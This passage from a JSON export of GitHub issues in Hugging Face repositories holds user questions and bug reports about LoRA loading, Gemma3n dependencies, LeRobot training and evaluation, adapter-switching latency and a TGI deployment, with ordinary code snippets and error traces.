"number": 7669, "title": "How can I add my custom data to huggingface datasets", "body": "I want to add my custom dataset to Hugging Face Datasets. Please guide me on how to achieve that.", "url": "https://github.com/huggingface/datasets/issues/7669", "state": "open", "labels": [], "created_at": "2025-07-04T19:19:54Z", "updated_at": "2025-07-05T18:19:37Z", "user": "xiagod" }, { "repo": "huggingface/lerobot", "number": 1442, "title": "Trained pi0 policy ignores visual cues", "body": "I am having an issue in which my trained pi0 policy looks smooth but it completely ignores the camera input. I have tried covering up a camera and the policy still looks smooth! This seems very wrong. I wonder if it is because my images are not normalized correctly? Has anyone else seen this?\n\n Do I need to change the \"NormalizationMode\" visual for pi0? Seems like this may be a repeat of https://github.com/huggingface/lerobot/issues/1065? 
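For anyone debugging something similar, this is the sanity check I'm running (a sketch: `dataloader` is my own training dataloader and the camera key comes from my dataset, so both are assumptions):

```python
# Hypothetical check: confirm what range the camera frames are in when they
# reach the policy. Replace the key with whatever your dataset uses.
batch = next(iter(dataloader))
img = batch["observation.images.top"]
print(img.dtype, img.min().item(), img.max().item())
# My working theory: if this prints uint8-style values in [0, 255] instead of
# floats in [0, 1], bad normalization could explain the policy ignoring vision.
```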
\n\n", "url": "https://github.com/huggingface/lerobot/issues/1442", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-03T20:13:08Z", "updated_at": "2025-08-12T09:47:09Z", "user": "kumarhans" }, { "repo": "huggingface/lerobot", "number": 1439, "title": "[QUESTION] run a policy on a real robot", "body": "Hi there, in the documentation, scripts to teleoperate, record, replay or evaluate a policy are provided, **but how do you run a policy for inference only on a real robot**? I did not find such a script.\n\nBesides, it may be interesting to add such a script to the documentation as well.\n\nThank you very much for your help\n", "url": "https://github.com/huggingface/lerobot/issues/1439", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-03T18:09:10Z", "updated_at": "2025-08-12T09:47:27Z", "user": "FaboNo" }, { "repo": "huggingface/smolagents", "number": 1512, "title": "How can we use this benchmark to evaluate local models?", "body": "examples/smolagents_benchmark/run.py\n\n", "url": "https://github.com/huggingface/smolagents/issues/1512", "state": "closed", "labels": [ "enhancement" ], "created_at": "2025-07-03T06:17:58Z", "updated_at": "2025-07-03T08:07:26Z", "user": "OoOPenN" }, { "repo": "huggingface/diffusers", "number": 11849, "title": "Cannot load fusionx_lora into original wan2.1-14b", "body": "Hello, I am adding the fusionx_lora to the original wan2.1-14b-i2v; my code is as follows:\n\n> pipe = WanImageToVideoPipeline.from_pretrained(my_local_path + \"Wan2.1-I2V-14B-480P-Diffusers\", vae=vae, image_encoder=image_encoder, torch_dtype=torch.bfloat16)\n> pipe.load_lora_weights(\n> my_local_path + \"Wan14BT2VFusioniX/FusionX_LoRa/Wan2.1_I2V_14B_FusionX_LoRA.safetensors\"\n> )\n\nBut I got some errors:\n\n \n\n> File \"/mmu_mllm_hdd_2/zuofei/infer_test/lora_infer_multi.py\", line 60, in process_image\n> pipe.load_lora_weights(\n> File \"/hetu_group/zuofei/env/wan_infer/lib/python3.12/site-packages/diffusers/loaders/lora_pipeline.py\", line 4869, in load_lora_weights\n> state_dict = self.lora_state_dict(pretrained_model_name_or_path_or_dict, **kwargs)\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n> File \"/hetu_group/zuofei/env/wan_infer/lib/python3.12/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\n> return fn(*args, **kwargs)\n> ^^^^^^^^^^^^^^^^^^^\n> File \"/hetu_group/zuofei/env/wan_infer/lib/python3.12/site-packages/diffusers/loaders/lora_pipeline.py\", line 4796, in lora_state_dict\n> state_dict = _convert_non_diffusers_wan_lora_to_diffusers(state_dict)\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n> File \"/hetu_group/zuofei/env/wan_infer/lib/python3.12/site-packages/diffusers/loaders/lora_conversion_utils.py\", line 1564, in _convert_non_diffusers_wan_lora_to_diffusers\n> num_blocks = len({k.split(\"blocks.\")[1].split(\".\")[0] for k in original_state_dict})\n> ~~~~~~~~~~~~~~~~~~^^^\n> IndexError: list index out of range\n\nCan you tell me how to fix it? 
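In case it helps with debugging, here is how I inspected the LoRA key layout (a small sketch using safetensors; the path is my local file):

```python
from safetensors import safe_open

# Peek at the key names the diffusers converter will see.
path = "Wan2.1_I2V_14B_FusionX_LoRA.safetensors"  # my local file
with safe_open(path, framework="pt") as f:
    keys = list(f.keys())

print(len(keys), keys[:5])
# The failing line splits on "blocks.", so the IndexError suggests that some
# (or all) keys do not contain a "blocks.<idx>." segment.
print([k for k in keys if "blocks." not in k][:10])
```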
Thank you so much!", "url": "https://github.com/huggingface/diffusers/issues/11849", "state": "open", "labels": [], "created_at": "2025-07-02T13:48:17Z", "updated_at": "2025-07-02T13:48:17Z", "comments": 0, "user": "fzuo1230" }, { "repo": "huggingface/transformers", "number": 39169, "title": "Using Gemma3n with text-only generation requires image dependencies", "body": "### System Info\n\n- `transformers` version: 4.53.0\n- Platform: macOS-15.5-arm64-arm-64bit\n- Python version: 3.12.8\n- Huggingface_hub version: 0.33.2\n- Safetensors version: 0.5.3\n- Accelerate version: not installed\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.7.1 (NA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n@zucchini-nlp \n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nI want to use the Gemma3n model in a text-only generation pipeline (without any multimodal inputs). I'm using the Gemma3nForCausalLM because it has only a language modeling head. But when running the script, it fails with an ImportError stating that `AutoImageProcessor` requires the PIL and timm libraries to work. How can I run Gemma3n for text-generation without those image-related dependencies?\n\n```python\nfrom transformers import AutoTokenizer, Gemma3nForCausalLM\nimport torch\n\nmodel_id = \"google/gemma-3n-e4b\"\n\nmodel = Gemma3nForCausalLM.from_pretrained(model_id)\ntokenizer = AutoTokenizer.from_pretrained(model_id)\n\nprompt = \"Once upon a time\"\ninputs = tokenizer(prompt, return_tensors=\"pt\").to(model.device)\noutput = model.generate(**inputs, max_length=30)\n\nresponse = tokenizer.decode(output[0], skip_special_tokens=True)\n\nprint(response)\n```\n\n### Expected behavior\n\nI expect the script to run successfully without installing `pillow` and `timm`.", "url": "https://github.com/huggingface/transformers/issues/39169", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-02T07:46:43Z", "updated_at": "2025-08-01T08:14:26Z", "comments": 6, "user": "marianheinsen" }, { "repo": "huggingface/lerobot", "number": 1429, "title": "When will the SmolVLA (2.25B & 0.24B) be released?", "body": "Hi dear authors,\nThanks for all the wonderful work on SmolVLA!\nI wonder, will you release the **SmolVLA (2.25B)**? I want to compare its performance with your released version (0.45B)", "url": "https://github.com/huggingface/lerobot/issues/1429", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-07-02T03:39:06Z", "updated_at": "2025-10-11T07:21:57Z", "user": "JuilieZ" }, { "repo": "huggingface/sentence-transformers", "number": 3416, "title": "How to calculate prompt tokens for embedding model encode?", "body": "I want to calculate the number of input prompt tokens and return it to the user, so they know how many tokens they consumed. How can I do that? 
Could you give me an example?", "url": "https://github.com/huggingface/sentence-transformers/issues/3416", "state": "open", "labels": [], "created_at": "2025-07-02T03:27:11Z", "updated_at": "2025-07-03T07:02:55Z", "user": "gaoxt1983" }, { "repo": "huggingface/sentence-transformers", "number": 3414, "title": "How to fine-tune a multimodal embedding model?", "body": "Hi @tomaarsen and Team - hope all is well & thanks for the work.\n\nI used to fine-tune some pure text-based embedding models using this package, and now I would like to fine-tune multimodal embedding models such as `llamaindex/vdr-2b-multi-v1` and `jinaai/jina-embeddings-v4`.\n\nI wonder if you can share some insights / relevant documentation / code examples?\n\nThank you.", "url": "https://github.com/huggingface/sentence-transformers/issues/3414", "state": "open", "labels": [], "created_at": "2025-07-01T23:45:04Z", "updated_at": "2025-07-03T10:25:29Z", "user": "groklab" }, { "repo": "huggingface/lerobot", "number": 1424, "title": "evaluated trained policy reports only 14 pc_success", "body": "I trained an ACT policy using \n\n```\npython lerobot/scripts/train.py \\\n --policy.type=act \\\n --dataset.repo_id=lerobot/act_aloha_sim_insertion_human \\\n --env.type=aloha \\\n --output_dir=outputs/train/act_aloha_insertion\n```\n\nQuestion: I think I mistakenly used the prefix `act_` in the `repo_id`, but if I don't use it I get this error:\n\n```\n$ python lerobot/scripts/train.py --policy.type=act --dataset.repo_id=lerobot/aloha_sim_insertion_human --env.type=aloha --output_dir=outputs/train/act_aloha_insertion\nINFO 2025-07-01 05:47:32 ils/utils.py:48 Cuda backend detected, using cuda.\nWARNING 2025-07-01 05:47:32 /policies.py:77 Device 'None' is not available. Switching to 'cuda'.\nTraceback (most recent call last):\n File \"/home/user/lerobot/lerobot/scripts/train.py\", line 291, in \n train()\n File \"/home/user/lerobot/lerobot/configs/parser.py\", line 226, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n File \"/home/user/lerobot/lerobot/scripts/train.py\", line 110, in train\n cfg.validate()\n File \"/home/user/lerobot/lerobot/configs/train.py\", line 120, in validate\n raise ValueError(\nValueError: 'policy.repo_id' argument missing. 
Please specify it to push the model to the hub.\n```\n\nUsing that \"act_\" prefix in the repo id, I attempted to evaluate it using the command below, but it reports a `pc_success` of 14%, which seems too low.\n\n```\n python lerobot/scripts/eval.py \\\n--policy.path=outputs/train/act_aloha_insertion/checkpoints/last/pretrained_model \\\n--env.type=aloha \\\n--eval.batch_size=10 \\\n--eval.n_episodes=50 \n```\n\nDetailed output of the above command:\n\n```\n$ python lerobot/scripts/eval.py --policy.path=outputs/train/act_aloha_insertion/checkpoints/last/pretrained_model --env.type=aloha --eval.batch_size=10 --eval.n_episodes=50 \nINFO 2025-07-01 05:33:14 pts/eval.py:467 {'env': {'episode_length': 400,\n 'features': {'action': {'shape': (14,),\n 'type': },\n 'agent_pos': {'shape': (14,),\n 'type': },\n 'pixels/top': {'shape': (480, 640, 3),\n 'type': }},\n 'features_map': {'action': 'action',\n 'agent_pos': 'observation.state',\n 'pixels/top': 'observation.images.top',\n 'top': 'observation.image.top'},\n 'fps': 50,\n 'obs_type': 'pixels_agent_pos',\n 'render_mode': 'rgb_array',\n 'task': 'AlohaInsertion-v0'},\n 'eval': {'batch_size': 10, 'n_episodes': 50, 'use_async_envs': False},\n 'job_name': 'aloha_act',\n 'output_dir': PosixPath('outputs/eval/2025-07-01/05-33-14_aloha_act'),\n 'policy': {'chunk_size': 100,\n 'device': 'cuda',\n 'dim_feedforward': 3200,\n 'dim_model': 512,\n 'dropout': 0.1,\n 'feedforward_activation': 'relu',\n 'input_features': {'observation.images.top': {'shape': (3,\n 480,\n 640),\n 'type': },\n 'observation.state': {'shape': (14,),\n 'type': }},\n 'kl_weight': 10.0,\n 'latent_dim': 32,\n 'license': None,\n 'n_action_steps': 100,\n 'n_decoder_layers': 1,\n 'n_encoder_layers': 4,\n 'n_heads': 8,\n 'n_obs_steps': 1,\n 'n_vae_encoder_layers': 4,\n 'normalization_mapping': {'ACTION': ,\n 'STATE': ,\n 'VISUAL': },\n 'optimizer_lr': 1e-05,\n 'optimizer_lr_backbone': 1e-05,\n 'optimizer_weight_decay': 0.0001,\n 'output_features': {'action': {'shape': (14,),\n 'type': }},\n 'pre_norm': False,\n 'pretrained_backbone_weights': 'ResNet18_Weights.IMAGENET1K_V1',\n 'private': None,\n 'push_to_hub': False,\n 'replace_final_stride_with_dilation': 0,\n 'repo_id': None,\n 'tags': None,\n 'temporal_ensemble_coeff': None,\n 'use_amp': False,\n 'use_vae': True,\n 'vision_backbone': 'resnet18'},\n 'seed': 1000}\nINFO 2025-07-01 05:33:14 pts/eval.py:476 Output dir: outputs/eval/2025-07-01/05-33-14_aloha_act\nINFO 2025-07-01 05:33:14 pts/eval.py:478 Making environment.\nINFO 2025-07-01 05:33:14 /__init__.py:84 MUJOCO_GL=%s, attempting to import specified O", "url": "https://github.com/huggingface/lerobot/issues/1424", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-01T12:16:38Z", "updated_at": "2025-08-12T09:49:05Z", "user": "raul-machine-learning" }, { "repo": "huggingface/lerobot", "number": 1421, "title": "It would help to have a description for the lerobot datasets:", "body": "For example, [lerobot/aloha_sim_insertion_human](https://huggingface.co/datasets/lerobot/aloha_sim_insertion_human) comes with no description at all.\n\n\nIt'd help to know:\n- What makes this data special/interesting\n- How to train different models in the simulator\n- What we should expect\n- What the `_human` suffix means, and how it differs from the `_script` suffix", "url": "https://github.com/huggingface/lerobot/issues/1421", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-07-01T10:14:45Z", "updated_at": "2025-08-12T09:49:27Z", "user": 
"raul-machine-learning" }, { "repo": "huggingface/lerobot", "number": 1419, "title": "simulator should allow pushing objects around with the mouse interactively", "body": "Not having this is preventing us from testing, debugging and playing with the robots.\n\nAccording to Mujoco documentation this feature available in their simulator but it is not exposed in lerobot:\n\n```\nA related usability feature is the ability to \u201creach into\u201d the simulation, push objects around and see how the \nphysics respond. The user selects the body to which the external forces and torques will be applied, and sees \na real-time rendering of the perturbations together with their dynamic consequences. This can be used to debug \nthe model visually, to test the response of a feedback controller, or to configure the model into a desired pose.\n```\n\nAlso for an awesome OOTB experience it would be great to have a script that loads a pretrained model and makes the interactive simulation just work.\n", "url": "https://github.com/huggingface/lerobot/issues/1419", "state": "open", "labels": [ "question", "simulation" ], "created_at": "2025-07-01T09:47:02Z", "updated_at": "2025-08-12T09:50:18Z", "user": "raul-machine-learning" }, { "repo": "huggingface/lerobot", "number": 1418, "title": "Robot tries to transfer cube even if it failed to pick it up, shouldn't it retry?", "body": "I am evaluating the following policy:\n```\npython lerobot/scripts/eval.py --policy.path=lerobot/act_aloha_sim_transfer_cube_human --env.type=aloha --env.task=AlohaTransferCube-v0 --eval.n_episodes=1 --eval.batch_size=1\n```\n\nHowever the robot fails to pick up the cube but carries on with the task, shouldn't the robot keep on trying until it picks up the cube? See the video\n\nhttps://github.com/user-attachments/assets/5ad20353-97bc-4d03-a78d-5f9f149c95f9\n", "url": "https://github.com/huggingface/lerobot/issues/1418", "state": "closed", "labels": [ "question", "simulation" ], "created_at": "2025-07-01T09:18:38Z", "updated_at": "2025-10-17T11:57:34Z", "user": "raul-machine-learning" }, { "repo": "huggingface/transformers", "number": 39137, "title": "ImportError: cannot import name 'pipeline' from 'transformers'", "body": "### System Info\n\nI am using Databricks notebook. \nDatabricks runtime: 13.3 LTS (includes Apache Spark 3.4.1, Scala 2.12)\n\n### Who can help?\n\n@Rocketknight1 @SunMarc @zach-huggingface\n\n### Information\n\n- [x] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nHere is the code:\n\n```\n%pip install --upgrade torch transformers accelerate deepspeed bitsandbytes huggingface_hub\ndbutils.library.restartPython()\n\nimport os\nimport torch\nfrom transformers import AutoTokenizer, AutoModelForCausalLM, pipeline\n```\n\nError:\n`ImportError: cannot import name 'pipeline' from 'transformers' (/local_disk0/.ephemeral_nfs/envs/pythonEnv-a13cd5c4-d035-4d04-87bd-75088348617d/lib/python3.10/site-packages/transformers/__init__.py)`\n\nPython: 3.10.12\ninstalled packages:\ntransformers== 4.53.0\nhuggingface_hub==0.33.1\ntorch==2.7.1+cu126\naccelerate==1.8.1\ndeepspeed==0.17.1\nbitsandbytes==0.46.0\n\nThese are all up-to-date versions for all of these packages. 
What is the problem?\n\n### Expected behavior\n\nImport without error.", "url": "https://github.com/huggingface/transformers/issues/39137", "state": "closed", "labels": [ "Usage", "bug" ], "created_at": "2025-06-30T18:49:54Z", "updated_at": "2025-10-23T00:53:19Z", "comments": 14, "user": "atabari-bci" }, { "repo": "huggingface/lerobot", "number": 1407, "title": "Can a user read the current signals from the lerobot?", "body": "Can a user read the current signals from the LeRobot?", "url": "https://github.com/huggingface/lerobot/issues/1407", "state": "open", "labels": [ "question", "sensors" ], "created_at": "2025-06-30T10:05:26Z", "updated_at": "2025-08-12T09:51:06Z", "user": "Frank-ZY-Dou" }, { "repo": "huggingface/optimum", "number": 2314, "title": "How to set the dynamic input sizes for decoder_with_past_model.onnx of NLLB", "body": "Dear author,\nI'm a beginner in optimum, so this question may be an elementary one. I used optimum to export decoder_with_past_model.onnx from nllb-200-distilled-600M. The resulting ONNX model has many inputs with dynamic shapes. Now I intend to overwrite the inputs with static sizes. However, I'm not sure about the correct settings. \n\nThere are 4 arguments to be determined and I set:\nbatch_size = 1\nencoder_sequence_length = 200 (same as max_length)\npast_decoder_sequence_length = 200\nencoder_sequence_length_out = 200\n\nAny suggestions are appreciated. Big thanks.\n\n![Image](https://github.com/user-attachments/assets/5f5da148-7e22-40f3-8d8c-6407884f469d)", "url": "https://github.com/huggingface/optimum/issues/2314", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-06-30T06:37:50Z", "updated_at": "2025-08-07T02:17:43Z", "user": "liamsun2019" }, { "repo": "huggingface/transformers", "number": 39114, "title": "Is there a way to force it to use an ASCII-based progress bar and not the ipython widget one?", "body": "When loading models, I like it better to have an ASCII-based progress bar and not an IPython one", "url": "https://github.com/huggingface/transformers/issues/39114", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-06-29T22:41:19Z", "updated_at": "2025-07-07T13:20:13Z", "comments": 0, "user": "weathon" }, { "repo": "huggingface/transformers", "number": 39105, "title": "How to use other NPU acceleration APIs?", "body": "### Feature request\n\nI noticed that transformers now supports using flash attention directly on the NPU via [```npu_flash_attention.py```](https://github.com/huggingface/transformers/pull/36696). There are many other acceleration APIs that can be used on the NPU, as shown in the [doc](https://www.hiascend.com/document/detail/zh/Pytorch/700/ptmoddevg/trainingmigrguide/performance_tuning_0028.html).\n\nHow can we use them directly in transformers? How can we switch seamlessly between different devices?\n\n### Motivation\n\nRequest to integrate other NPU acceleration APIs into transformers. 
If this can be done, the ease of using transformers on the NPU will be greatly improved.", "url": "https://github.com/huggingface/transformers/issues/39105", "state": "closed", "labels": [ "Feature request" ], "created_at": "2025-06-29T08:26:29Z", "updated_at": "2026-01-04T07:23:26Z", "user": "zheliuyu" }, { "repo": "huggingface/candle", "number": 3013, "title": "Word timestamps for whisper", "body": "Hi, is there no way to get word timestamps using Whisper in candle?\n\nThe example successfully demonstrates retrieving segment timestamps, but how would one retrieve word timestamps?\n\nWhen I look into the Python code, they seem to pass this `word_timestamp=True` argument while transcribing and get the result with the `base` model.\n\nIs there any workaround, or can someone point me towards how to achieve this, please?", "url": "https://github.com/huggingface/candle/issues/3013", "state": "open", "labels": [], "created_at": "2025-06-29T01:16:38Z", "updated_at": "2025-06-29T23:47:39Z", "comments": 2, "user": "bp7968h" }, { "repo": "huggingface/trl", "number": 3662, "title": "What is the point of steps_per_gen in GRPO Trainer", "body": "Hello, can you please explain what the point of steps_per_gen in the GRPO training config is when we already have num_iterations? The policy update logic can then simply be:\n\nIf num_iterations == 1, generation and model updates are on-policy (per_token_logps = old_per_token_logps).\n\nWhen num_iterations > 1, the same generation will be used multiple times, and per_token_logps will be different from old_per_token_logps for all but the first time a generation batch is used. \n\nWhy is steps_per_gen needed? It just makes the overall batch generation and splitting logic unnecessarily difficult to understand. ", "url": "https://github.com/huggingface/trl/issues/3662", "state": "open", "labels": [ "\u2753 question", "\ud83c\udfcb GRPO" ], "created_at": "2025-06-28T20:08:01Z", "updated_at": "2025-07-25T08:05:50Z", "user": "ankur6ue" }, { "repo": "huggingface/lerobot", "number": 1399, "title": "calibrate.py for only follower", "body": "The calibrate.py file doesn't work for setting up the motors for the follower arm, as there aren't enough parameters for the function to run. Has anyone made an adaptation of the calibrate file that doesn't take the teleop into consideration?", "url": "https://github.com/huggingface/lerobot/issues/1399", "state": "open", "labels": [ "question", "teleoperators" ], "created_at": "2025-06-27T20:53:47Z", "updated_at": "2025-08-12T09:51:53Z", "user": "ramallis" }, { "repo": "huggingface/transformers", "number": 39091, "title": "`transformers`' dependency on `sentencepiece` blocks use on windows in python 3.13", "body": "### System Info\n\nDue to \n* changes in Python 3.13,\n* an incompatibility in `sentencepiece`,\n* `transformers` dependency on `sentencepiece`,\n\n`transformers` cannot be easily installed under windows + py3.13, and does not work as a dependency of other packages in this environment.\n\nThere are multiple issues and a merged PR on sentencepiece (https://github.com/google/sentencepiece/pull/1084) from Feb 26 2025, but no release has been forthcoming.\n\n\n\n### Who can help?\n\n* people currently using `sentencepiece` in `transformers` code they own\n* people determining what the scope of `transformers`' OS & python support is\n* `sentencepiece` pypi maintainers\n\n\n### Reproduction\n\n1. Be on windows\n2. Be on python 3.13\n3. Try to install current `transformers` from pypi\n4. 
If you get this far, use any function importing `sentencepiece`, e.g. loading an `xlm_roberta` model\n\n### Expected behavior\n\nCode doesn't raise exception", "url": "https://github.com/huggingface/transformers/issues/39091", "state": "closed", "labels": [ "Usage" ], "created_at": "2025-06-27T15:23:57Z", "updated_at": "2025-07-03T16:02:47Z", "comments": 5, "user": "leondz" }, { "repo": "huggingface/transformers", "number": 39073, "title": "Inefficient default GELU implementation in GPT2", "body": "While profiling the HuggingFace GPT2 model, I found that the default GELU backend used is NewGELUActivation, which is inefficient in most cases. Instead of using a fused CUDA kernel, NewGELUActivation executes multiple separate PyTorch-level operators, leading to unnecessary kernel launches and memory overhead.\n\n```python\n# activations.py:L46\nclass NewGELUActivation(nn.Module):\n def forward(self, input: Tensor) -> Tensor:\n return 0.5 * input * (1.0 + torch.tanh(math.sqrt(2.0 / math.pi) * (input + 0.044715 * torch.pow(input, 3.0))))\n```\n\nIs there a reason why NewGELUActivation is still used as the default for GPT2, rather than switching to nn.functional.gelu or another fused alternative?\n\nI\u2019d be happy to share profiler traces or help test a patch if helpful.", "url": "https://github.com/huggingface/transformers/issues/39073", "state": "closed", "labels": [], "created_at": "2025-06-27T09:07:39Z", "updated_at": "2025-08-12T03:35:13Z", "comments": 4, "user": "null-pointer-access" }, { "repo": "huggingface/diffusers", "number": 11816, "title": "set_adapters performance degrades with the number of inactive adapters", "body": "### Describe the bug\n\n### Goal\nBuild an image-generation service with `StableDiffusionXLPipeline` that:\n\n1. Keeps ~50 LoRA adapters resident in GPU VRAM.\n2. For each request:\n \u2022 activate **\u2264 5** specific LoRAs via `pipeline.set_adapters(...)` \n \u2022 run inference \n \u2022 deactivate them (ready for the next request).\n\n### Issue\n`pipeline.set_adapters()` becomes progressively slower the more unique LoRAs have ever been loaded,\neven though each call still enables only up to five adapters.\n\n| # LoRAs ever loaded | `set_adapters()` time (s) | \n|---------------------|---------------------------|\n| 3 | ~ 0.1031 | \n| 6 | ~ 0.1843 | \n| 9 | ~ 0.2614 |\n| 12 | ~ 0.3522 | \n| 45 | ~ 1.2470 | \n| 57 | ~ 1.5435 |\n\n### What I\u2019ve tried\n1. **Load LoRAs from disk for every request** ~ 0.8 s/LoRA, too slow. \n2. **Keep LoRAs in RAM (`SpooledTemporaryFile`) + `pipeline.delete_adapter()`** \u2013 roughly as slow as (1). \n3. **Keep all 50 LoRAs on the GPU** and just switch with `set_adapters()` \u2013 fastest so far, but still shows the O(N)-style growth above.\n\n### Question\nIs this increasing latency expected? \nIs there a recommended pattern for caching many LoRAs on the GPU and switching between small subsets without paying an O(total LoRAs) cost every time?\n\nAny guidance (or confirmation it\u2019s a current limitation) would be greatly appreciated!\n\n### Reproduction\n\n
\nCode\n\n``` Minimal example\nimport os\nimport time\nfrom typing import List\nfrom pydantic import BaseModel\nfrom diffusers import StableDiffusionXLPipeline, AutoencoderTiny\nimport torch\nfrom diffusers.utils import logging\nlogging.disable_progress_bar()\nlogging.set_verbosity_error() \n\npipeline = None\n\nclass Lora(BaseModel):\n name: str\n strength: float\n\ndef timeit(func):\n def wrapper(*args, **kwargs):\n start = time.time()\n result = func(*args, **kwargs)\n end = time.time()\n duration = end - start\n print(f\"{func.__name__} executed in {duration:.4f} seconds\")\n return result\n return wrapper\n\n@timeit\ndef load_model():\n pipeline = StableDiffusionXLPipeline.from_pretrained(\n \"stabilityai/stable-diffusion-xl-base-1.0\",\n torch_dtype=torch.float16,\n vae=AutoencoderTiny.from_pretrained(\n 'madebyollin/taesdxl',\n use_safetensors=True,\n torch_dtype=torch.float16,\n )\n ).to(\"cuda\")\n pipeline.set_progress_bar_config(disable=True)\n\n return pipeline\n\n@timeit\ndef set_adapters(pipeline, adapter_names, adapter_weights):\n pipeline.set_adapters(\n adapter_names=adapter_names,\n adapter_weights=adapter_weights,\n )\n\n@timeit\ndef fuse_lora(pipeline):\n pipeline.fuse_lora()\n\n@timeit\ndef inference(pipeline, req, generator=None):\n return pipeline(\n prompt=req.prompt,\n negative_prompt=req.negative_prompt,\n width=req.width,\n height=req.height,\n num_inference_steps=req.steps,\n guidance_scale=req.guidance_scale,\n generator=generator,\n ).images\n\ndef apply_loras(pipeline, loras: list[Lora]) -> str:\n if not loras or len(loras) == 0:\n pipeline.disable_lora()\n return\n \n pipeline.enable_lora()\n for lora in loras:\n try:\n pipeline.load_lora_weights(\n \"ostris/super-cereal-sdxl-lora\",\n weight_name=\"cereal_box_sdxl_v1.safetensors\",\n adapter_name=lora.name,\n token=os.getenv(\"HUGGINGFACE_HUB_TOKEN\", None),\n )\n except ValueError:\n continue # LoRA already loaded, skip\n except Exception as e:\n print(f\"Failed to load LoRA {lora}: {e}\")\n continue\n set_adapters(\n pipeline,\n adapter_names=[lora.name for lora in loras],\n adapter_weights=[lora.strength for lora in loras],\n )\n fuse_lora(pipeline)\n \n\n return\n\ndef generate_images(req, pipeline):\n generator = torch.Generator(device=\"cuda\").manual_seed(42)\n\n apply_loras(pipeline, req.loras)\n\n images = inference(\n pipeline,\n req,\n generator=generator,\n )\n\n pipeline.unfuse_lora()\n \n return images\n\nclass GenerationRequest(BaseModel):\n prompt: str\n loras: List[Lora] = []\n negative_prompt: str = \"\"\n width: int = 512\n height: int = 512\n steps: int = 30\n guidance_scale: float = 7\n\ndef test_lora_group(pipeline, lora_group: List[Lora], group_number: int): \n test_req = GenerationRequest(\n prompt=\"a simple test image\",\n loras=[Lora(name=lora_name, strength=0.8) for lora_name in lora_group],\n width=256,\n height=256,\n steps=10,\n )\n \n try:\n generate_images(test_req, pipeline)\n return True, lora_group\n except Exception as e:\n return Fa", "url": "https://github.com/huggingface/diffusers/issues/11816", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-26T22:27:54Z", "updated_at": "2025-09-29T14:33:13Z", "comments": 27, "user": "hrazjan" }, { "repo": "huggingface/lerobot", "number": 1393, "title": "motor configuration request - one motor at a time like configure_motors", "body": "I like the new process generally but I think the ability to configure a single motor was valuable (e.g., re-configure a single problematic configuration rather than having to go through 
the full configuration).\n\nIn addition to the current process, it would be nice if we could bring that per-motor functionality forward, maybe the ability to pass a single motor ID to `lerobot.setup_motor`? \n\nref: https://huggingface.co/docs/lerobot/en/so101#2-set-the-motors-ids-and-baudrates\n", "url": "https://github.com/huggingface/lerobot/issues/1393", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-06-26T19:27:36Z", "updated_at": "2025-08-12T09:52:30Z", "user": "brainwavecoder9" }, { "repo": "huggingface/text-generation-inference", "number": 3277, "title": "Rubbish responses from Llama-3.3-70B-Instruct when the Messages API is enabled.", "body": "### System Info\n\nTGI endpoint deployed on AWS SageMaker using the 3.2.3 image version. \nThe image URI is `763104351884.dkr.ecr.us-east-1.amazonaws.com/huggingface-pytorch-tgi-inference:2.6.0-tgi3.2.3-gpu-py311-cu124-ubuntu22.04`\nThe environment is:\n```python\nenv = {'HF_MODEL_ID': 'meta-llama/Llama-3.3-70B-Instruct', \n 'HF_TASK': 'text-generation', \n 'SM_NUM_GPUS': '8', \n 'MAX_INPUT_LENGTH': '2048', \n 'MAX_TOTAL_TOKENS': '4096', \n 'MAX_BATCH_PREFILL_TOKENS': '4096', \n 'HUGGING_FACE_HUB_TOKEN': None, \n 'MESSAGES_API_ENABLED': 'true', \n 'ENABLE_PREFILL_LOGPROBS': 'false'\n}\n```\nNote the **MESSAGES_API_ENABLED** above.\n\nDeployed using the AWS Python SDK:\n```python\nfrom sagemaker.huggingface.model import HuggingFaceModel\n\nHuggingFaceModel(\n env=env,\n image_uri=image_uri,\n name=params.endpoint_name,\n role=get_my_sagemaker_execution_role(),\n )\n```\n\nDeployed on a ml.g5.48xlarge machine.\n\n### Information\n\n- [ ] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nUsing the SageMaker Python SDK, when invoking using a manually rendered chat template, I get the following response:\n```python\nfrom transformers import AutoTokenizer\nfrom sagemaker.huggingface.model import HuggingFacePredictor\n\n# define messages\nmessage_dict = [{'role': 'user', 'content': 'Who is the president of the United States?'},\n {'role': 'assistant',\n 'content': 'The current president of the United States is Donald Trump.'},\n {'role': 'user',\n 'content': (\n \"Your task is to rewrite the given question in a context independent manner.\\n\"\n \"Here are some examples:\\n\\n\"\n \"Example 1:\\n\"\n \"Q: What is the capital of France?\\n\"\n \"A: Paris?\\n\"\n \"Q: How many people live there?\\n\"\n \"Rewrite: How many people live in Paris?\\n\\n\"\n \"Example 2:\\n\"\n \"Q: Do I need a visa to travel to the United States?\\n\"\n \"A: Yes, you need a visa to travel to the United States.\\n\"\n \"Q: What is the process to get a visa?\\n\"\n \"Rewrite: What is the process to get a visa for 